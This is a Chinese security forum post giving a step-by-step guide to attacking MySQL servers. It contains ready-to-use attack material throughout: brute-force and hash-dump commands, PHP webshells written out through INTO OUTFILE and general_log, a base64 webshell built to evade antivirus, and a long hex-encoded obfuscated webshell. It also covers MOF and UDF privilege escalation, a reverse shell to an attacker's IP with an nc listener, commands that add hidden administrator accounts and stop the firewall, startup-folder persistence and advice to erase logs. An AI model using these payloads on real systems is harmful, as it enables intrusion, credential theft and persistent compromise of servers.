安全矩阵

 找回密码
 立即注册
搜索
查看: 2418|回复: 0

Mysql数据库渗透及漏洞利用

[复制链接]

252

主题

252

帖子

1307

积分

金牌会员

Rank: 6Rank: 6

积分
1307
发表于 2022-5-16 00:38:05 | 显示全部楼层 |阅读模式
原文链接:Mysql数据库渗透及漏洞利用

MySQL 数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用 MySQL 作为其数据库支撑,目前很多架构都以 MySQL 作为数据库管理系统,例如 LAMP、和 WAMP 等。

在针对网站渗透中,很多都是跟 MySQL 数据库有关,各种 MySQL 注入,MySQL 提权,MySQL 数据库 root 账号 webshell 获取等的,但没有一个对 MySQL 数据库渗透较为全面对总结。

在研究 MySQL 数据库安全之余,对 MySQL 如何通过 msf、sqlmap 等来进行扫描、漏洞利用、提权、MySQL 密码破解和获取 webshell 等进行了详细研究。

一、 Mysql信息收集

1、端口信息收集

Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用:

(1)iisputter,直接填写3306端口,IP地址填写单个或者C段地址。
(2)nmap扫描nmap -p 3306 192.168.1.1-254

特定目标的渗透,可能需要对全端口进行扫描,可以使用Nmap对某一个IP地址进行全端口扫描,端口扫描软件还有sfind等DOS下扫描的工具。

2、版本信息收集

(1)msf查看版本信息auxiliary/scanner/mysql/mysql_version模块,以扫描主机192.168.157.130为例,命令为:
  1. use auxiliary/scanner/mysql/mysql_version

  2. set rhosts 192.168.157.130

  3. run
复制代码
(2)mysql查询版本命令:
  1. SELECT @@version`、`SELECT  version();
复制代码
(3)sqlmap通过注入点扫描确认信息:
  1. sqlmap.py -u url --dbms mysql
复制代码
4)phpmyadmin管理页面登录后查看localhost->变量->服务器变量和设置中的version参数值。

3、数据库管理信息收集

Mysql管理工具有多种,例如phpmyadmin网站管理,Navicat for MySQL以及MysqlFront等客户端工具。这些工具有的会直接保存配置信息,这些信息包含数据库服务器地址和数据库用户名以及密码,通过嗅探或者破解配置文件可以获取密码等信息。

4、msf信息收集模块

(1)mysql哈希值枚举
  1. use auxiliary/scanner/mysql/mysql_hashdump

  2. set username root

  3. set password root

  4. run
复制代码
(2)获取相关信息
  1. use auxiliary/admin/mysql/mysql_enum
  2. set username root
  3. set password root
  4. run
复制代码

获取数据库版本,操作系统名称,架构,数据库目录,数据库用户以及密码哈希值。

(3)执行mysql语句,连接成功后可以在msf执行sql语句,跟sqlmap的--sql-shell模块类似。
  1. use auxiliary/admin/mysql/mysql_sql
复制代码
(4)将mysql_schem导出到本地 /root/.msf4/loot/文件夹下
  1. use auxiliary/scanner/mysql/mysql_schemadump
复制代码
(5)文件枚举和目录可写信息枚举
  1. auxiliary/scanner/mysql/mysql_file_enum
  2. auxiliary/scanner/mysql/mysql_writable_dirs
复制代码

没有测试成功过,需要定义枚举目录和相关文件,觉得基本没有啥用。

二、Mysql密码获取
(一)、暴力破解

Mysql暴力破解主要有几种:

1、网页在线连接破解

可以使用burpsuite和phpMyAdmin多线程批量破解工具。 下载:
https://portswigger.net/burp/、http://pan.baidu.com/s/1c1LD6co

2、msf通过命令行进行暴力破解

msf破解mysql密码模块auxiliary/scanner/mysql/mysql_login,其参数主要有BLANK_PASSWORDS、BRUTEFORCE_SPEED、DB_ALL_CREDS、DB_ALL_PASS、DB_ALL_USERS、PASSWORD、PASS_FILE、Proxies、RHOSTS、RPORT、STOP_ON_SUCCESS、THREADS、USERNAME、USERPASS_FILE、USER_AS_PASS、USER_FILE、VERBOSE参数。对单一主机仅仅需要设置RHOSTS、RPORT、USERNAME、PASSWORD和PASS_FILE,其它参数根据实际情况进行设置。

(1)场景A:对内网获取root某一个口令后,扩展渗透
  1. use auxiliary/scanner/mysql/mysql_login
  2. set RHOSTS 192.168.157.1-254
  3. set password root
  4. set username root
  5. run
复制代码

执行后对192.168.157.1-254进行mysql密码扫描验证。

(2)场景B:使用密码字典进行扫描
  1. use auxiliary/scanner/mysql/mysql_login
  2. set RHOSTS 192.168.157.1-254
  3. set pass_file /tmp/password.txt
  4. set username root
  5. run
复制代码


3、使用nmap扫描并破解密码

(1)对某一个IP或者IP地址段进行nmap默认密码暴力破解并扫描
  1. nmap --script=mysql-brute 192.168.157.130
  2. nmap --script=mysql-brute 192.168.157.1-254
复制代码
(2)使用root账号root密码进行mysql密码验证并扫描获取指定IP地址的端口信息以及mysql数据库相关信息
  1. nmap -sV --script=mysql-databases --script-argsmysqluser=root,mysqlpass=root 192.168.157.130
复制代码
(3)检查root空口令
  1. nmap --script mysql-empty-password 192.168.195.130
复制代码

4.使用hscan工具对mysql口令进行扫描,需要设置扫描IP地址段以及数据库口令字典及用户名字典。

(二)、源代码泄露

1、网站源代码备份文件

一些网站源代码文件中会包含数据库连接文件,通过查看这些文件可以获取数据库账号和密码。一般常见的数据库连接文件为config.php、web.config、conn.asp、db.php/asp、jdbc.properties、sysconfig.properties、JBOSS_HOME\docs\examples\jca\XXXX-ds.xml。以前有一款工具挖掘鸡可以自定义网站等名称对zip/rar/tar/tar.gz/gz/sql等后缀文件进行扫描。

2、配置备份文件

使用ultraedit等编辑文件编辑数据库配置文件后,会留下bak文件。

(三)文件包含

本地文件包含漏洞可以包含文件,通过查看文件代码获取数据库配置文件,进而读取数据库用户名和密码。

(四)其它情况

有些软件会将IP地址、数据库用户名和密码写进程序中,运行程序后,通过cain软件进行嗅探,可以获取数据库密码。另外Mysql客户端管理工具有的管理员会建立连接记录,这些连接记录保存了用户名、密码和连接IP地址或者主机名,通过配置文件或者嗅探可以获取用户名和密码。

三、Mysql获取webshell
(一)phpmyadminroot账号获取webshell

MysqlRoot账号通过phpMyAdmin获取webshell的思路,主要有下面几种方式,以第一二六八种方法较佳,其它可以根据实际情况来进行。

1、直接读取后门文件

通过程序报错、phpinfo函数、程序配置表等直接获取网站真实路径,有些网站前期已经被人渗透过,因此在目录下留有后门文件通过load_file直接读取。

2、直接导出一句话后门

前提需要知道网站的真实物理路径,例如呼求偶真实路径D:\work\WWW,则可以通过执行以下查询,来获取一句话后门文件cmd.php,访问地址http://www.secfree.com/cmd.php
  1. select '<?php @eval($_POST[antian365]);?>'INTO OUTFILE 'D:/work/WWW/antian365.php'
复制代码


3、创建数据库导出一句话后门

在查询窗口直接执行以下代码即可,跟2.原理类似。
  1. CREATE TABLE `mysql`.`antian365` (`temp` TEXT NOTNULL );

  2. INSERT INTO `mysql`.`antian365` (`temp` ) VALUES('<?php @eval($_POST[antian365]);?>');

  3. SELECT `temp` FROM `antian365` INTO OUTFILE'D:/www/antian365.php';

  4. DROP TABLE IF EXISTS `antian365`;
复制代码

4、可执行命令方式

创建执行命令形式的shell,但前提是对方未关闭系统函数。该方法导出成功后可以直接执行DOS命令,使用方法:www.xxx.com/antian365.php?cmd=(cmd=后面直接执行dos命令)。
  1. select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/antian365.php'
复制代码
另外在linux下可以导出直接执行命令的shell:
  1. SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';
复制代码

http://localhost/shell.php?c=cat%20/etc/passwd

5、过杀毒软件方式

通过后台或者存在上传图片的地方,上传图片publicguide.jpg,内容如下:
  1. <?php$a=' PD9waHAgQGV2YWwoJF9QT1NUWydhbnRpYW4zNjUnXSk7ZGllKCk7Pz4=';error_reporting(0);@set_time_limit(0);eval("?>".base64_decode($a));?>
复制代码
然后通过图片包含temp.php,导出webshell。
  1. select '<?php include 'publicguide.jpg' ?>'INTO OUTFILE 'D:/work/WWW/antian365.php'
复制代码

一句话后门密码:antian365

6、直接导出加密webshell

一句话后门文件密码:pp64mqa2x1rnw68,执行以下查询直接导出加密webshell,D:/WEB/IPTEST/22.php,注意在实际过程需要修改D:/WEB/IPTEST/22.php。
  1. select unhex('203C3F7068700D0A24784E203D2024784E2E737562737472282269796234327374725F72656C6750383034222C352C36293B0D0A246C766367203D207374725F73706C697428226D756B3961773238776C746371222C36293B0D0A24784E203D2024784E2E73756273747228226C396364706C616365704172424539646B222C342C35293B0D0A246A6C203D2073747269706F732822657078776B6C3766363674666B74222C226A6C22293B0D0A2474203D2024742E737562737472282274514756325957774A63567534222C312C36293B0D0A2465696137203D207472696D28226A386C32776D6C34367265656E22293B0D0A2462203D2024622E73756273747228226B6261736536346B424474394C366E6D222C312C36293B0D0A246967203D207472696D28226233397730676E756C6922293B0D0A2479203D2024792E24784E28227259222C22222C22637259726572596122293B0D0A24797531203D207374725F73706C697428226269316238376D3861306F3678222C32293B0D0A2474203D2024742E24784E282278413678222C22222C2277784136786F4A463922293B0D0A246E64203D2073747269706F7328226E363574383872786E303265646A336630222C226E6422293B0D0A2462203D2024622E24784E282277493339222C22222C225F774933396477493339656322293B0D0A2468387073203D207374725F73706C697428226B6E396A3968346D6877676633666A6970222C33293B0D0A2479203D2024792E7375627374722822687974655F66756E775669535645344A222C322C36293B0D0A24796637203D207374726C656E282275656875343967367467356B6F22293B0D0A2474203D2024742E24784E28226670222C22222C22516670546670314E667022293B0D0A246D39203D207374726C656E282265756C363034636F626B22293B0D0A2462203D2024622E73756273747228226C3057316F64656C413165536E454A222C342C33293B0D0A2468306277203D207472696D28226E33653568306371746F6B76676F6238747822293B0D0A2479203D2024792E24784E28227962222C22222C2263796274696F22293B0D0A24733761203D20727472696D2822617565627963396734743564386B22293B0D0A2474203D2024742E7375627374722822624D73306E4268383355577964222C392C34293B0D0A2464353971203D2073747269706F732822636A7675636B6F79357766336F746561222C226435397122293B0D0A2479203D2024792E73756273747228226E4439487851534C386E6752222C392C31293B0D0A246C31203D207374725F73706C697428226167717130396762716E31222C34293B0D0A2474203D2024742E24784E282277366F34222C22222C2277634477366F345977366F343022293B0D0A247079203D2073747269706F7328226C677938687472727631746333222C22707922293B0D0A2474203D2024742E24784E282265503332222C22222C22625846655033326822293B0D0A2478703364203D2073747269706F732822756B6C306E626E7839677433222C227870336422293B0D0A2474203D2024742E7375627374722822696B4A3030484A4D6E677863222C372C35293B0D0A2464743262203D207374726C656E282265346135616275616A7733766C6369726122293B0D0A2474203D2024742E737562737472282263644E314B78656D35334E776D456838364253222C372C34293B0D0A2475626A203D207374726C656E28227767686A6E6674326F70356B7831633038367422293B0D0A2474203D2024742E73756273747228226D34616F7864756A676E58536B63784C344657635964222C372C36293B0D0A247178203D207374726C656E2822726C71666B6B6674726F3867666B6F37796122293B0D0A2474203D2024742E7375627374722822723779222C312C31293B0D0A246D75203D20727472696D28226E676478777578357671653122293B0D0A246A203D2024792822222C20246228247429293B0D0A24626E6C70203D207374726C656E28227675667930616B316679617622293B0D0A24736468203D207374725F73706C69742822776D6E6A766733633770306D222C34293B0D0A246D62203D206C7472696D28226E353270317067616570656F6B6622293B0D0A2465307077203D20727472696D28227575346D686770356339706E613465677122293B0D0A24756768203D207472696D282272637064336F3977393974696F3922293B0D0A246772636B203D207374726C656E2822783572697835627031786B793722293B0D0A24656F3674203D207374726C656E282264646931683134656375797563376422293B246A28293B0D0A2464766E71203D207374725F73706C6974282270726D36676968613176726F333630346175222C38293B0D0A24756738203D20727472696D28226563387735327375706234767538656F22293B0D0A24726374203D2073747269706F73282268786536776F37657764386D65376474222C2272637422293B0D0A24656B7166203D207374725F73706C69742822707266357930386538666C6666773032356A38222C38293B0D0A24767972203D207374725F73706C69742822756D706A63737266673668356E64366F3435222C39293B0D0A24777266203D20727472696D282266797839396F3739333868377567716822293B0D0A24713134203D207374726C656E2822746334366F73786C3173743169633222293B0D0A66756E6374696F6E206F2820297B2020207D3B0D0A24757366203D207374726C656E2822666C7463707862377466626A736D7422293B0D0A3F3E') into dumpfile 'D:/WEB/IPTEST/22.php'
复制代码


注意:
也可以使用http://tool.lu/hexstr/网站的代码转换来实现,将需要导出的文件代码复制到网站的字符串中,通过字符串转成十六进制,将十六进制字符串放入unhex函数进行查询即可:
  1. select unhex('十六进制字符串') into dumpfile 'D:/WEB/shell.php'
复制代码

7、CMS系统获取webshell

有些情况下无法获取网站的真实路径,则意味着无法直接导出一句话webshell,可以通过CMS系统管理账号登录系统后,寻找漏洞来突破,例如dedecms则可以通过破解管理员账号后直接上传文件来获取webshell。Discuz!的UC_key可以直接获取webshell。甚至某些系统可以直接上传php文件。下面是一些CMS系统渗透的技巧:

(1)dedecms系统的密码有直接md5,也有20位的密码,如果是20位的密码则需要去掉密码中的前3位和最后1位,然后对剩余的值进行md5解密即可;
(2)phpcms v9版本的密码需要加salt进行破解,需要选择破解算法md5(md5($pass).$salt)进行破解。
(3)Discuz!论坛帐号保存在ucenter_members(Discuz7.X及以上版本)或者cdb_members(discuz6.x版本)表中,其破解需要带salt进行,其破解时是使用password:salt进行,例如a0513df9929afc972f024fa4e586e829:399793。

8、general_log_file获取webshell

(1)查看genera文件配置情况
  1. show global variables like "%genera%";
复制代码
(2)关闭general_log
  1. set global general_log=off;
复制代码
(3)通过general_log选项来获取webshell
  1. set global general_log='on';
  2. SET global general_log_file='D:/phpStudy/WWW/cmd.php';
复制代码
在查询中执行语句:
  1. SELECT '<?php assert($_POST["cmd"]);?>';
复制代码

Shell为cmd.php,一句话后门,密码为cmd。

(二)sqlmap注入点获取webshell

sqlmap注入点获取webshell的前提是具备写权限,一般是root账号,通过执行命令来获取:
  1. sqlmap -u url--os-shell

  2. echo "<?php @eval($_POST['c']);?>" >/data/www/1.php
复制代码


四、Mysql提权
(一)、mof提权

1、Webshell上传mof文件提权

MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:
  1. 方法1:运行 MOF 文件指定为命令行参数 Mofcomp.exe 文件。
  2. 方法2:使用 IMofCompiler 接口和 $ CompileFile 方法。
  3. 方法3:拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。
复制代码

Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用IMofCompiler::CompileFile方法。第三种方法仅为向后兼容性与早期版本的 WMI提供,并因为此功能可能不会提供在将来的版本后,不应使用。注意使用MOF方法提权的前提是当前Root帐号可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下,否则会失败!

该漏洞的利用前提条件是必须具备mysql的root权限,在Kingcope公布的0day中公布了一个pl利用脚本。
  1. perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555
复制代码

192.168.2.100为mysql数据库所在服务器,mysql口令为空,反弹到192.168.2.150的5555端口上。

2、生成nullevt.mof文件

将以下代码保存为nullevt.mof文件:
  1. #pragma namespace("\\\\.\\root\\subscription")


  2. instance of __EventFilter as $EventFilter


  3. {


  4. EventNamespace = "Root\\Cimv2";


  5. Name  = "filtP2";


  6.     Query = "Select \ From __InstanceModificationEvent "


  7.             "Where TargetInstance Isa "Win32_LocalTime" "


  8.             "And TargetInstance.Second = 5";


  9. QueryLanguage = "WQL";


  10. };




  11. instance of ActiveScriptEventConsumer as $Consumer


  12. {


  13.     Name = "consPCSV2";


  14. ScriptingEngine = "JScript";


  15. ScriptText =


  16.     "var WSH = new ActiveXObject("WScript.Shell")\nWSH.run("net.exe user admin admin /add")";


  17. };


  18. instance of __FilterToConsumerBinding


  19. {


  20.     Consumer   = $Consumer;


  21.     Filter = $EventFilter;


  22. };
复制代码


3、通过Mysql查询将文件导入

执行以下查询语句,将上面生成的nullevt.mof导入到c:\windows\system32\wbem\mof\目录下在windows7中默认是拒绝访问的。导入后系统会自动运行,执行命令。
  1. selectload_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
复制代码
(二)Msf直接mof提权
  1. use exploit/windows/mysql/mysql_mof
  2. set rhost 192.168.157.1 //设置需要提权的远程主机IP地址
  3. set rport 3306 //设置mysql的远程端口
  4. set password root //设置mysql数据库root密码
  5. set username root //设置mysql用户名
  6. options //查看设置
  7. run 0
复制代码

技巧:
要是能够通过网页连接管理(phpmyadmin),则可以修改host为%并刷新权限后,则可以通过msf等工具远程连接数据库。默认root等账号不允许远程连接,除非管理员或者数据库用户自己设置。

方法1:本地登入mysql,更改 mysql数据库里的 user 表里的 host项,将localhost改为%
  1. use mysql;

  2. update user set host = '%' where user = 'root';

  3. FLUSH PRIVILEGES ;

  4. select host, user from user;
复制代码


方法2:直接授权(推荐)
从任何主机上使用root用户,密码:youpassword(你的root密码)连接到mysql服务器:
  1. # mysql -u root -proot
  2. GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION;
  3. FLUSH PRIVILEGES;
复制代码

荐重新增加一个用户,在实际测试过程中发现很多服务器使用root配置了多个地址,修改后可能会影响实际系统的运行。在实际测试过程中因此建议新增一个用户,授权所有权限,而不是直接更改root配置。

(三)UDF提权

UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限,其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数,有root账号密码
Windows下UDF提权对于Windows2008以下服务器比较适用,也即针对Windows2000、Windows2003的成功率较高。

1、UDF提权条件

(1)Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
(2)Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。
(3)掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限的其它账号也可以。
(4)可以将udf.dll写入到相应目录的权限。

2、提权方法

(1)获取数据库版本、数据位置以及插件位置等信息
  1. select version();//获取数据库版本
  2. select user();//获取数据库用户
  3. select @@basedir ;//获取安装目录
  4. show variables like '%plugins%';  //寻找mysql安装路径
复制代码
(2)导出路径
  1. C:\Winnt\udf.dll    Windows 2000
  2. C:\Windows\udf.dll   Windows2003(有的系统被转义,需要改为C:Windowsudf.dll)
复制代码

MYSQL 5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的libplugin文件夹下才能创建自定义函数。该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建libplugin文件夹,然后将udf.dll文件导出到该目录即可。

在某些情况下,我们会遇到Can't open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,网上大牛发现利用NTFS ADS流来创建文件夹的方法:
  1. select @@basedir;  //查找到mysql的目录
  2. select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';   //利用NTFS ADS创建lib目录
  3. select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录
复制代码

执行成功以后就会plugin目录,然后再进行导出udf.dll即可。

(3)创建cmdshell 函数,该函数叫什么名字在后续中则使用该函数进行查询:
  1. create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’;
复制代码
(4)执行命令:
  1. select sys_eval(‘whoami’);
复制代码

一般情况下不会出现创建不成功哦。
连不上3389可以先停止windows防火墙和筛选
  1. select sys_eval(‘net stop policyagent’);
  2. select sys_eval(‘net stop sharedaccess’);
复制代码
udf.dll下常见函数:
  1. cmdshell  执行cmd;
  2. downloader  下载者,到网上下载指定文件并保存到指定目录;
  3. open3389    通用开3389终端服务,可指定端口(不改端口无需重启);
  4. backshell   反弹Shell;
  5. ProcessView 枚举系统进程;
  6. KillProcess 终止指定进程;
  7. regread     读注册表;
  8. regwrite    写注册表;
  9. shut        关机,注销,重启;
  10. about       说明与帮助函数;
复制代码
具体用户示例:
  1. select cmdshell('net user iis_user 123!@#abcABC /add');
  2. select cmdshell('net localgroup administrators iis_user /add');
  3. select cmdshell('regedit /s d:web3389.reg');
  4. select cmdshell('netstat -an');
复制代码
(5)清除痕迹
  1. drop function cmdshell;//将函数删除
复制代码

删除udf.dll文件以及其它相关入侵文件及日志。

(6)常见错误

1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

在my.ini或者mysql.cnf文件中注销 (使用#号) 包含secure_file_priv的行(SHOW VARIABLES LIKE "secure_file_priv")。

1123 - Can't initialize function 'backshell'; UDFs are unavailable with the --skip-grant-tables option

需要将my.ini中的skip-grant-tables选项去掉。

3、webshell下udf提权

通过集成udf提权的webshell输入数据库用户名及密码以及数据库服务器地址或者IP通过连接后导出进行提权。

4、Mysql提权综合利用工具

v5est0r 写了一个Mysql提权综合利用工具,详细情况请参考其代码共享网站:https://github.com/v5est0r/Python_FuckMySQL其主要功能有:
  1. (1)自动导出你的backdoor和mof文件
  2. (2)自动判断mysql版本,根据版本不同导出UDF的DLL到不同目录,UDF提权
  3. (3)导出LPK.dll文件,劫持系统目录提权
  4. (4)写启动项提权
复制代码
UdF自动提权:
  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m udf
复制代码
LPK劫持提权:
  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m lpk
复制代码
启动项提权:
  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" –mst
复制代码

例如通过LOAD_FILE来查看Mysql配置文件my.ini,如果其中配置了skip-grant-tables,这无法进行提权

(四)无法获取webshell提权

1、连接mysql

(1)mysql.exe -h ip -uroot -p
(2)phpmyadmin
(3)Navicat for MySQL

2、查看数据库版本和数据路径
  1. SELECT VERSION( );
  2. Select @@datadir;
  3. 5.1以下版本,将dll导入到c:/windows或者c:/windows/system32/
  4. 5.1以上版本 通过以下查询来获取插件路径:
  5. SHOW VARIABLES WHERE Variable_Name LIKE "%dir";
  6. show variables like '%plugin%' ;
  7. select load_file('C:/phpStudy/Apache/conf/httpd.conf')
  8. select load_file('C:/phpStudy/Apache/conf/vhosts.conf')
  9. select load_file('C:/phpStudy/Apache/conf/extra/vhosts.conf')
  10. select load_file('C:/phpStudy/Apache/conf/extra/httpd.conf')
  11. select load_file('d:/phpStudy/Apache/conf/vhosts.conf')
复制代码

3、修改mysql.txt

Mysql.txt为udf.dll的二进制文件转成十六进制代码。

(1)先执行导入ghost表中的内容

修改以下代码的末尾代码  select backshell("YourIP",4444);

(2)导出文件到某个目录
  1. select data from Ghost into dumpfile 'c:/windows/mysqldll.dll';
  2. select data from Ghost into dumpfile 'c:/windows/system32/mysqldll';
  3. select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll';
  4. select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll';
  5. select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll'
  6. select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll';
  7. select load_file('C:/ProgramData/MySQL/MySQL Server 5.1/Data/mysql/user.frm');
  8. select data from Ghost into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/mysqldll.dll'
复制代码

(3)查看FUNCTION中是否存在cmdshell和backshell
存在则删除:
  1. drop FUNCTION cmdshell;//删除cmdshell
  2. drop FUNCTION backshell;//删除backshell
复制代码
创建backshell:
  1. CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; //创建backshell
复制代码
在具备独立主机的服务器上执行监听:
  1. nc -vv -l -p 44444
复制代码
执行查询:
  1. select backshell("192.192.192.1",44444);//修改192.192.192.1为你的IP和端口
复制代码

4、获取webshell后添加用户命令

注意如果不能直接执行,则需要到
  1. c:\windows\system32\下执行

  2. net user antian365 www.xianzhi.aliyun.com /add

  3. net localgroup administrators antian365
复制代码


(五)sqlmap直连数据库提权

Sqlmap直接连接数据库提权,需要有写入权限和root账号及密码,命令如下:

(1)连接数据库
  1. sqlmap.py -d "mysql://root:123456@219.115.1.1:3306/mysql" --os-shell
复制代码

(2)选择操作系统的架构,32位操作系统选择1,64位选择2
.
(3)自动上传udf或提示os-shell

(4)执行whomai命令如果获取系统权限,则表示提权成功。

(六)msfudf提权

Kali渗透测试平台下执行(kali下载地https://www.kali.org/downloads/):
  1. msfconsole
  2. use exploit/windows/mysql/mysql_payload
  3. options
  4. set rhost 192.168.2.1
  5. set rport 3306
  6. set username root
  7. set password 123456
  8. run 0或者exploit
复制代码

msf下udf提权成功率并不高,跟windows操作系统版本,权限和数据库版本有关,特别是secure-file-priv选项,如果有该选项基本不会成功。

(七)启动项提权

1、创建表并插入vbs脚本到表中

依次使用以下命令:
  1. show databases ;
  2. use test;
  3. show tables;
  4. create table a (cmd text);
  5. insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
  6. insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnetaspnettest/add"",0)") ;
  7. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " );
  8. select \ from a;
复制代码

导出vbs脚本到启动
使用以下命令将刚才在a表中创建的vbs脚本导出到启动选项中。
  1. select \ from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
复制代码

导入成功后,系统重新启动时会自动添加密码为“1”且用户名称为“1”的用户到管理员组中。在实际使用过程中该脚本成功执行的几率比较低,有时候会出现不能导出的错误。

推荐使用以下脚本:
  1. show databases ;
  2. use test;
  3. show tables;
  4. create table b (cmd text);
  5. insert into b values ("net user Aspnet123545345! /add");
  6. insert into b values ("net localgroup administrators Aspnet /add");
  7. insert into b values ("del b.bat");
  8. select  from b into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\b.bat";
复制代码

该脚本执行后虽然会闪现Dos窗口,如果有权限导入到启动选项中,则一定会执行成功,在虚拟机中通过MySQL连接器连接并执行以上命令后,在C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录中会有刚才导出的b.bat脚本文件。

说明

在不同的操作系统中C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录文件名称可能会不同,这个时候就要将其目录换成相应的目录名称即可。例如如果是英文版本操作系统则其插入的代码为:
  1. select  from b into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\b.bat";

  2. Windows 2008 Server的启动目录为:

  3. C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs
复制代码
其vbs方法可以参考如下写法:
  1. create table a (cmd text);
  2. insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
  3. insert into a values ("a=wshshell.run (""cmd.exe /c net user antian365 qwer1234!@# /add"",0) " );
  4. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators antian365 /add"",0) " );
  5. select \ from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs";
复制代码
msf下模块exploit/windows/mysql/mysql_start_up提权
  1. use exploit/windows/mysql/mysql_start_up
  2. set rhost 192.168.2.1
  3. set rport 3306
  4. set username root
  5. set password 123456
  6. run
复制代码

msf下mysql_start_up提权有一定的几率,对英文版系统支持较好。

五、Msf其它相关漏洞提权
1、Mysql身份认证漏洞及利用(CVE-2012-2122)

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 存在漏洞。

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23  不存在漏洞
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not    不存在漏洞
  1. use auxiliary/scanner/mysql/mysql_authbypass_hashdump
复制代码

2、exploit/windows/mysql/mysql_yassl_hello

3、exploit/windows/mysql/scrutinizer_upload_exec

六、mysql密码破解
(一)cain工具破解mysql密码

使用UltraEdit-32编辑器直接打开user.MYD文件,打开后使用二进制模式进行查看,在root用户后面是一串字符串,选中这些字符串将其复制到记事本中,这些字符串即为用户加密值,例如506D1427F6F61696B4501445C90624897266DAE3。

注意:

(1)root后面的“”不要复制到字符串中。
(2)在有些情况下需要往后面看看,否则得到的不是完整的MYSQLSHA1密码,总之其正确的密码位数是40位。

安装cain工具,使用cracker,右键单击“Add tolist”将Mysql Hashes值加入到破解列表中,使用软件中的字典、暴力破解等方式来进行暴力破解。

(二)网站在线密码破解

1、cmd5.com破解。将获取的mysql值放在cmd5.com网站中进行查询,mysql密码一般都是收费的。

2、somd5.com破解。Somd5.com是后面出现的一个免费破解网站,每次破解需要手工选择图形码进行破解,速度快,效果好,只是每次只能破解一个,而且破解一次后需要重新输入验证码。

(三)oclhash破解

hashcat支持很多种破解算法,免费开源软件,官方网站https://hashcat.net/hashcat/,破解命令:

hashcat64.exe -m 200myql.hashpass.dict //破解MySQL323类型

hashcat64.exe -m 300myql.hashpass.dict //破解MySQL4.1/MySQL5类型

(四)John the Ripper password cracker

John the Ripper下载地址:http://www.openwall.com/john/h/john179w2.zip,John the Ripper除了能够破解linux外,还能破解多种格式的密码。
  1. Echo 81F5E21E35407D884A6CD4A731AEBFB6AF209E1B>hashes.txt
  2. John –format =mysql-sha1 hashes.txt
  3. john --list=formats | grep mysql //查看支持mysql密码破解的算法
复制代码



























































本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 04:36 , Processed in 0.021318 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.
